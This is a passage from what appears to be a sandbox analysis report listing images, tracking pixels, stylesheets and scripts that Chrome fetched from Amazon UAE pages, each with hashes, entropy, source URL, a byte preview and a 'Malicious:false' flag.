                                                                                                                                                                                                        SHA-512:B82E04E96B798CAAD39EDB6005DBD2E13BDF8523E96F7E2C5DE1DA3493320BA6CE3CE325577EB3FB213812321831D89699A850D12926CB68DA54444FCDFA96FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/71O65lbuaVL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3..................................................................y.. ..pW$.`E...R"V..."...A....6....]q.. .t...R.......a\%..q"..Z.W.-......D.(...>..G^y...../.l........XP...k.Q....:"`.."$...Q.....=;d.4.x;..em..%.Uea..2.j...."JR`........n..lB..."........IIU.k.k..`."&.R..Y..P.-...?..#P...UB!..Ej...k....E...V.kK...++...*.5$.'..|.^....G.YT.\.\......8..t%.....V..`.T...L.,\...R`....J.u+....hL#?.:..?..........r.b=N.Q<.E.>UI....]..4..59.L.*.SL1N.v.6..../"..N/..r..,....2.w.O.e..{.}.........G......qTL,.~nv.u.\....;q...r+.9.9..q.[..f..O_..5..Gi.....U.L.H.,...k.03s..2.s}#..k..........._.O..:....=>?"..3..W..W....b.K.V.%.Z.K....A..3.1.m...P...Jk..{..y_O,..=.....cd...1[Z..m'X..4.o.....Tm9..Dk.......C.L...=Uo5..Z..T.i.,V=bSz.......f.i.'e.A.u^S...^.NI.G...#.....m.c..X..j. 6......u a._...,.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4953
                                                                                                                                                                                                        Entropy (8bit):7.808623190624863
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tm24/lgJMTP/XUW8w6LMd4FtyKtgu67UEE8qDWfjwMwqUyULaL5rZC7QG314Lan:qdgmT3KOCFp2BIX26LaL5NeQG314Lan
                                                                                                                                                                                                        MD5:36DC28BC6344043974296566C2E5019C
                                                                                                                                                                                                        SHA1:862F994728472A39BF99D76544A4BF946F1264DA
                                                                                                                                                                                                        SHA-256:079004AD284CC3B814896907F57E873D486101DBE4285F74C7067BDF9B6935BB
                                                                                                                                                                                                        SHA-512:354E0BBEF69C79F08D234360CF6323CC0A3EBE9F8A635899EC670C8D918491D1A11720F025F93F821246F7A9F352B9BF8E9DADAA4344C576668B2D6D8C709B0B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31J42iPc2iL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1..............................................................................................7.9.8...U.:...sc,o.........a.!...c.la..... ............<..}I.TyP-..g......B.T).H..U.@....'.>.y.-g.'O....J.Yy.L;.7....FC...gd..u...9...$.C.^.D.P.g|Lb...M)S..-. .O.([..Kj.2t%9.....K..%.....-..GnS6...C.&...|;..;.;.;...6... w.a...\..._V.{.C.K....8w..p{$...N.......[\.9n...n<..:/`.}.6._.'\f.t]...c.....#.v'..6....7nY.}"c.....j...O.k.:.".&^e...u....$....5...eg....$...t{....:x...~.'w..c....1?...8oW...9.[.6..Jn........;_4. ".......Z{z..O..Q.............|}TR....T...............................0..........................1.!23. 4@.."#0A$p.BQ............30o..Mxv..s.)!..I...-........9...kQ.2...c..h;|.!A.......n....M.97a.f..&......u..o...k7Y.!.rf....X@."..o%]=.+_.A.#.zG...6EYH......._.P.Z.....u....tqI)y\B9.>s.Dd
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 198x408, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):16608
                                                                                                                                                                                                        Entropy (8bit):7.972352487301919
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:z0ZWoX4mfLGAthC68zxTuwIH6uB1EFG7S:z0ZWoomzGvBzxdHe1EFMS
                                                                                                                                                                                                        MD5:9C8E5318D6DDF170230171910EE214CF
                                                                                                                                                                                                        SHA1:CE86D4A540596D5894D7AF75DFB94FCBEAE48E7D
                                                                                                                                                                                                        SHA-256:42A0F455AECAC713BD3AB8B4DD042156606FE1BAC1B63D4DB316EAEDBF374979
                                                                                                                                                                                                        SHA-512:D4E3162BF494F1D59BB379FB0DDA50AAC127F308106D585CA534082604A008E264A158FD9AB81B24F68F0BC54FFBE67F8966031670CD7C598D03065969B55F28
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/41UwiqzW6eL.AC_SX250.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1.AQ...."2aq.35RTrst......#46BS....Ub.$Cc.%Ede.D.................................................!.1...A.Qa............?...-..n.q.N...M^.._.f..J.. _...]..+......N._.(:.[...4.'....Z.....F......08*..........#....k?.....?....T8.....'..P^_...8>..my..uo.....j...o.+?........j......?9._.P...........Ar.s... ...?..R......o.+.@..X...\....X+....X*......+> ...>.Aq~sz.............Z.....T.q.s......k........-/...-4^6..:.\&..OS.........=P............E......,...L.}F.....'`.....o.>.Z..^!..>...6S._B.$H/U.....W...Wq..8tnL. ..Y.VPU....?.]=.;.\l...{!{;...q....T.Ps.}...ia..).w.%s......%^.qw.:....J..Tx#.E.......{z...o3...K..f.^..U...V..N.J...R{.e..RPPS.....7....0..X...k7){fQ'.H..*..K....]7og,.:0.-N...4..w[...l......{...M.....W7.e."I..1....<.u
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (37608)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):380429
                                                                                                                                                                                                        Entropy (8bit):5.056921064204483
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:YeDhae/RAVHXnY22z8iS22f2PyFrmR/0dUORBf4TCP6QnO4TevPjhuujRdUOfVss:3a/dUORBf4TCPAB7TMtIvFBtfVyK
                                                                                                                                                                                                        MD5:C9FFF24760CA22D8F548F780969EEA2A
                                                                                                                                                                                                        SHA1:6383994C0D2ABC3FFC2CDF4B3DB7BC8E22CD8834
                                                                                                                                                                                                        SHA-256:06CAED9ED1D5552375128F5CCFEC880224D4B06B2789B0CAFC7AAB0E11622231
                                                                                                                                                                                                        SHA-512:1B45852AFBB6A88FD2C3CBD11005879470D84F3D25D706BBB3AF259DBB07114F7D71C83141DD0CF7C4BE291FA812C1A933765E88155ECDE6375381F127B0FBB3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://images-eu.ssl-images-amazon.com/images/I/41-WpIOxHtL._RC%7C71S7yoZEbpL.css,51u4GJlQjiL.css,118zqOsmV-L.css,31-P1-9TebL.css,31YZpDCYJPL.css,21pkK7OQMnL.css,41Xj8tZc2XL.css,110Nj+wUGYL.css,31OvHRW+XiL.css,01R53xsjpjL.css,11EKggV-DlL.css,415g7iDx4VL.css,11qTzxZ0Y5L.css_.css?AUIClients/NavDesktopUberAsset&JoiNCr6G"
                                                                                                                                                                                                        Preview:#accountMenu-container,#hmenu-container{position:fixed;top:0;left:0;right:0;bottom:0;visibility:hidden;z-index:100000}#accountMenu-container div,#hmenu-container div{display:flex}#accountMenu-container.hmenu-visible,#hmenu-container.hmenu-visible{visibility:visible}#accountMenu-container a,#accountMenu-container a:hover,#accountMenu-container a:link,#accountMenu-container a:visited,#hmenu-container a,#hmenu-container a:hover,#hmenu-container a:link,#hmenu-container a:visited{font-family:inherit}#accountMenu-container #accountMenu-canvas-background,#accountMenu-container #hmenu-canvas-background,#hmenu-container #accountMenu-canvas-background,#hmenu-container #hmenu-canvas-background{position:absolute;will-change:opacity;height:100%;width:100%;-webkit-tap-highlight-color:transparent}#accountMenu-container #accountMenu-canvas-background.hmenu-bkg-color,#accountMenu-container #hmenu-canvas-background.hmenu-bkg-color,#hmenu-container #accountMenu-canvas-background.hmenu-bkg-color,#hmenu-co
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12378
                                                                                                                                                                                                        Entropy (8bit):7.906298624082549
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:KLdPr+x6wMESGehV6E12cqd6wpC6HTd6ba6VJ5C/g4ZDsgHSRFdyfPCWn:KLvwFSGykE12gwP6u6H0/glcSNyfKWn
                                                                                                                                                                                                        MD5:635C1F9BCA0B6682A9629D23A2499BEC
                                                                                                                                                                                                        SHA1:28FED44220A01C59E5F980E893CED147EE52AEFF
                                                                                                                                                                                                        SHA-256:586888B085A99F4997B188A26E1E8B0D5687CB3B819626E7FABC7F31CB73AF2D
                                                                                                                                                                                                        SHA-512:F386C41CB94700D83715E16E09FF90D2FE2CBA95189C0278F59B00F7A19C6188FF014B7B0547D94DC390DFC80ACC1F81CD48F2E7CF534B75E2ED8BCA838F56C3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................,..........................................G ..............[...i.0..S.K...Q....O.W.v.9..Bc.. .....:.;..t\v..m..v2.........Z....z..?E~id#...W..........?!fpl..%...U.9b.<.5...76.?y.=.)....7r.E...k..."9.]...t.+F.g.1v......W..W2.3./~....X...........1...`.:1..6d8.6..LY{..~o....2.E......)"#.hHa.".......0:....$R..o=d{.....0.......1.,a.sX,.e..G.?B|6}1..GP.....,U...E...K....)a#.h.b.......0Z..FzH.*...].wT..g@.........b.-..f.c-....xk.,....DQI..2BG...L.2..C,U..@C.q.QU.vwvq..v.F3.QQU..e;.....@............O7..h.Z...C\UDU.Q.q.C$$QI...3...RDQ...pM..RDS.q.Z]ZF.R.u..UG.WV.FO....g..:........>c.q...7..kqiQE\E....RDG...C,$x\../.".d............n......q.x+...2......f.........7.8~k..............:.(.H......g......)a....(...9#.....&...q.y.%.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12239
                                                                                                                                                                                                        Entropy (8bit):7.948646559390208
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EVefiwpUW1HVQpqAqTs+BaIsjLHCn2hcqE2z6mmVb2tpyF/ZmWBRTThF6J3/+:E8fvtR2pqAqTsrICbPE24F4WBBlF6F+
                                                                                                                                                                                                        MD5:C1747CA74BA1F870A81718E87FD104FA
                                                                                                                                                                                                        SHA1:DA60A0186987E513029FE5573B79F00A12323E4A
                                                                                                                                                                                                        SHA-256:A72477E19A8E1A2665F3D168F328C7903149BE355BB33E5F687D159D2E9236AE
                                                                                                                                                                                                        SHA-512:846212B9D589AE4F376A641F3802217B75E5700336BE7CB6897881A97B743D64D8BCAF0DBB8E740B2E15AEDECBE38910431CA42868BC01E47AC9EDDB4DBFC1AC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/51vSWnZJsfL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................g)f....F>...~.....^..6v....7.w...U.*...?E.....:.~./2...../......?..PH.v.Z*^.Z..R.._g.D..4.*.q..[O.y....-c.O>uO+..l...6....^g.......;`t.j..._..UR..h..O..:z.jU....N.....U..xF..K...Q.4..TP..0..T.C..gz.....z.[.i.....)o5.k.@TS..Fs.{zJ...;...'....m.m./tR.q!.;}?<.0.....X.Q.qD.Dl...=}..&Q..`.&..0...I...2.-..%.f.2..;".....^.K]4.\M..].....l.. ...L.&....9..+....L).:.0i.7M..rc.kY./.l.O@,....T..2...^W.....L.....dHisr....\-.U..S.@.V.z.B..~.MVm..........F.../.F.....xQ...b.$;.ap`.y......+nmG.Eu.*...Y.csi.Zq.^.%Ux.b..z.r=qUL[......w.TZ.T}.0<.{.......0....n&..`.d....s#..(8.].w..~...X.k=.f.x...5OfcqN....<.5..=M$.c...3.Oi.Z..*..)..@.L.G../*......n...p..jg|...E.5.a5.....8Isn.@.@....!.O.7..Gq..s+..amH..n.VDb{....y....nz;LY0.&
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D5782%26at%3D5782%26t%3D1723729113762%26csmtags%3DbrowserQuiteMut%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5781
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D3007%26pc%3D5787%26at%3D5787%26t%3D1723729113767%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5786
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2589
                                                                                                                                                                                                        Entropy (8bit):7.7712717716698
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6X5JulF+VOBl603eLHbETbhhmn1i2APiLb3geYVHq:Tf5JgL3YMbqI2APKb3AVK
                                                                                                                                                                                                        MD5:8C6776BF2CFA22C6AFEACADE6CC45D99
                                                                                                                                                                                                        SHA1:D9C5945B48E04C9E5CEEAE97851B3B8259F85956
                                                                                                                                                                                                        SHA-256:AE2BE6C7E77EC1E0490D5DD7CC2DD64EC7F0BB7C1793890CD56AA0EF3860D99D
                                                                                                                                                                                                        SHA-512:B06A69B39A59C4B386B2ADF09F45AC180E67A3FF61844D208424990E5E4A7BBAF2831EA77262217EA68C81EB4985C5FB201F2714516F0D89AB17A015B959CA69
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745515_372x232_2X_en_AE._SY116_CB558011712_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..................................................................!1AQ."aq...RS....#2r...$3CUb...................................................!..134Qq...."A..Ba.............?..."q.........................................wlzqk..l....,..<...xEa.A2\8=.Z........r.Q....A._Y......D...C.Vn.:..Z.?`..3.......k.ed.U.H..d..<J.^...9...p(...wW.S~:.W.u..L...6...C.......f..F...'@.....$.]N.U-.CU...{..L;.:.......?Mu.l/6........-.....V_.-.;.``.Z...ZU..K{1....../..<".A....f.vUQ....H.oE....G...LM.....YCr.h.m.....'...Q/..y<.J_>.e...b...UC.2..T.{<..R..L4.l..LsX..,....8.K."&#L..................Yx.c.....2.*..H..%.+?....#......?.....qvU....9Ks.4.>....~S.;.C.).z..Oo7..3....1.0*{.s.r.(.....!X...Z..K...k.}J..g..vB/.H..Q;].U/..X....BA_.Z}0...X.....Q}.....)6..4.V._..].;..S.......=E9>g.P..2..........w......}...s..Du..y
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (821)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):119435
                                                                                                                                                                                                        Entropy (8bit):5.310726578286396
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:zdYvqPLlRf9SVENCDQ6/vZMYAtCYw/dU4+ruUrrXVzOetY+YCG92G:evef9SVENCk6/8CYwS4urXVzVNG
                                                                                                                                                                                                        MD5:47B144E02567BC5C6BC2F7E048E8F26E
                                                                                                                                                                                                        SHA1:9BA12ECD4B5C1E79C8EFB4B132A7E785C4745EE7
                                                                                                                                                                                                        SHA-256:6EB4B1AB4FFBCB4172E4A0F3DDBD68F8B896671496820AD5749D21204A34C69A
                                                                                                                                                                                                        SHA-512:87843E2807D4A3DB2D63F9A2F6FE82AAAABBC8A62141DC47A919865844B2421C382007266069BBCF69ABC7606F87B0C62ACC42CC41A8718CE1C99EE2C2B948DB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://images-eu.ssl-images-amazon.com/images/I/21ZMwVh4T0L._RC%7C21OJDARBhQL.js,218GJg15I8L.js,31lucpmF4CL.js,2119M3Ks9rL.js,61p+cK5jpzL.js_.js?AUIClients/AuthenticationPortalAssets&BS5ThWEP"
                                                                                                                                                                                                        Preview:(function(f){var g=window.AmazonUIPageJS||window.P,h=g._namespace||g.attributeErrors,e=h?h("JQueryUI_Core_AUIBuild",""):g;e.guardFatal?e.guardFatal(f)(e,window):e.execute(function(){f(e,window)})})(function(f,g,h){f.when("jQuery").register("jQueryUI-core",function(e){(function(b,e){function f(a,c){var d=a.nodeName.toLowerCase();if("area"===d){c=a.parentNode;d=c.name;if(!a.href||!d||"map"!==c.nodeName.toLowerCase())return!1;a=b("img[usemap\x3d#"+d+"]")[0];return!!a&&g(a)}return(/input|select|textarea|button|object/.test(d)?.!a.disabled:"a"===d?a.href||c:c)&&g(a)}function g(a){return b.expr.filters.visible(a)&&!b(a).parents().addBack().filter(function(){return"hidden"===b.css(this,"visibility")}).length}var h=0,k=/^ui-id-\d+$/;b.ui=b.ui||{};b.extend(b.ui,{version:"1.10.3",keyCode:{BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,NUMPAD_SUBTRACT:109,PAGE_DOWN:34,PAGE_U
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 103x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4819
                                                                                                                                                                                                        Entropy (8bit):7.919927298406657
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TKKviPbAjSyzVf958TM1GFCqB66AT/N+JW84lUClS5XVSEqLtYsTLMvFH27Fg89n:f1jSo952M1qkXRAt4+ZXVSEPsTLMNqFF
                                                                                                                                                                                                        MD5:91492F6603032C6395C645E064CAE47A
                                                                                                                                                                                                        SHA1:58874C21477ABA2ECCDB56FB2C34C2176AE3088F
                                                                                                                                                                                                        SHA-256:74CC21D3D386DF71FAA4C0B4213E4D4FF61AE23156A59E9DD99DDD9351C53329
                                                                                                                                                                                                        SHA-512:D8EF3865E9FEBE961C3D3F21893C3AD12B2F6035F6FB681B0B4EB7E66F3F92233C82F0BA5E21AFEA825B129F735F3190AABC5CD55497CD69D62D4A0D4A8BF4E7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61xur6u9CKL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........g.."................................................................!1.."A.Qa.26Bq.......Rrsu..#34t.......5S...Ub.....................................................!1."..#AQ..2aq................?..t.(.)J.JT_..zN...^...,V.#|....J3. ..P.o.>..u]Y4.%..e!B fI.n..*....{.:...r8w..n-5_....0.:.;(....t..<-........0.?..`!.y....V...m2J.pY.H..l....=DP..^...][.|.}._../.A.L.j..Oy? =..WC..}.P./.`....n.[...!..n8.I....5E.-2..v..X......+...if..@....<..;.y...G./..ubW.f..:..,u.5-..........bR.A...>...s.r...A.......R......)@+Uz@.pf....y...j.HO.z......4.?n..3.g.Y...]....K....[Y..../E..l...l.y=.........0If.UF.bN.Q.[:#.Ke........{..*...<....FNX..W.....|:...c....p.i.v..0.'.........wn.Z.8.W.5Cauw.....p.\L.$...\rJ.M..4.<..%...+....:|@.......%.`>..n........(....Pd.Z..M..+w....e.K.r..R.~..d..Z{.+ug.....|.......3....Z.<~...W
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):34542
                                                                                                                                                                                                        Entropy (8bit):7.977546728683746
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:628Fy2O8TTm+ofQqHSQjY/x986iJJpSBTaO4trs0COB:6Fy2jTTm+ofQmxgbsJJkr4trs0COB
                                                                                                                                                                                                        MD5:AE3CB3878CB4812AB5714825B0412F4A
                                                                                                                                                                                                        SHA1:3FB4ED064B10DA206B84224AC5A80FF53522435F
                                                                                                                                                                                                        SHA-256:75A6A197DBB8688F0ECB9224630C13E890E13A401D3EDE1D74053E173D114678
                                                                                                                                                                                                        SHA-512:40386598CE4E17A77D3903337D759A3CF883BF2EBB19F037EA150C8C135B545409F58B6C23677ECAA240D47493E2C4D64148F8EC9FA99F86D02D347C99273865
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5...................................................................9..9.oS..y.7a..3o%vH..RP....................<=..%J.-. ....9v.].h..(....v.....N_.......yLci=.;...+....U.}.]..l..s.ws._......N.G...o.<..7.}.F.]C.,>^.k..=!.7)..4V._:.M...kyFj.e.....2.e.X.\.E.B.y/...2.....{.......:....^*..P;.../.c.......E.sC...w.#7v..Z../.Y|.......GZ..ucZ.P.......a...9~...?G..v.i..e..........B...:.{v..>..l>..|...2....8..8.-....f..[.Uy...;{`f..=...0.;%zc...z....:.."..&..HYh....z:.6...q.U...N.'.9i......|5K.$...[.~.e..<0.<....7.y......O....i.'....Kg/R.-K{>|G8t.(y.4..<....{....r.[..]}q.<........ek.w+.c.....u...c..Z..]s..6....?.....g.z.z.P.h.8c..ox..~...6..SI{<]......b0.....nv.I....b.......p....fo-..5v...}...c.:....}gV........m..5.....:...~..W:DY..e.J..\8.....^)......<}...t.o.y^.....Z..'..h..}..]r/]
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (30956)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):31002
                                                                                                                                                                                                        Entropy (8bit):5.263859562616461
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:HkhQ+LMasRxY7xky/1VXYmkDsdJS4Ok0o0MRbjigQeUpteUHiyYNDbDUhBGP95xD:AQms7kx9E4Ok2rKLP9
                                                                                                                                                                                                        MD5:055C05372F5DFC6548345AC9EEAE6E31
                                                                                                                                                                                                        SHA1:81AE805B0ACE186FEDAFFB681415144B73860388
                                                                                                                                                                                                        SHA-256:7D14FAAF807F0DECFDF513F91AAD06F18704B4DE223201E16A638F42F91DEED9
                                                                                                                                                                                                        SHA-512:E37106F6CA36CAFBF3041466F14DEA1E89C0CF7788E1536A0B82DB4D39BF15BE538FE5E793AE119AF813F75AE7DEFD68BB8D3E0832D992181CAAA089C4D57CD8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js
                                                                                                                                                                                                        Preview:(()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature","cf",e),a("criticalFeature","cf",t),a("loaded","ld")),o=a("loaded","ld",e),l=(a("loaded","ld",t),a("viewablelatency:bodyBegin","bb",i),a("viewablelatency:loaded","ld",i),(e,t)=>{console.error(e,t)}),d=e=>{e.sendLatencyMetric(n),e.sendLatencyMetric(r)},c=e=>"V"===e,h={1027:"Sponsored Display DRA"},m={1:"Enabled",0:"NotEnabled","-1":"Unknown"},u=e=>v(e),v=e=>decodeURIComponent(escape(atob(e))),p=e=>e&&0===Object.keys(e).length&&e.constructor===Object;let g=null,w=null,b=null,f=null,y=null;const C=new class{viewabilityStandards(){return f=f||[],f}payload(){return b=b||{},b}},M={ext:{inViewPercentage:()=>(g=g||0,Math.round(100*g)),geom:()=>(w=w||{},w)}},x={playingTime:()=>(y=y||0,y)},E=()=>C,P=()=>x,T=e=>{var t,i,a,s;g=void 0!==(null==e|
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2649
                                                                                                                                                                                                        Entropy (8bit):7.802966138392855
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rmQc1jbaUkoEwLaUOxTlTcrL3iYwrcOWmcViY2u2QMsscyEKFf:TFt7EwLajxtMuYmcOzxu2QMWK5
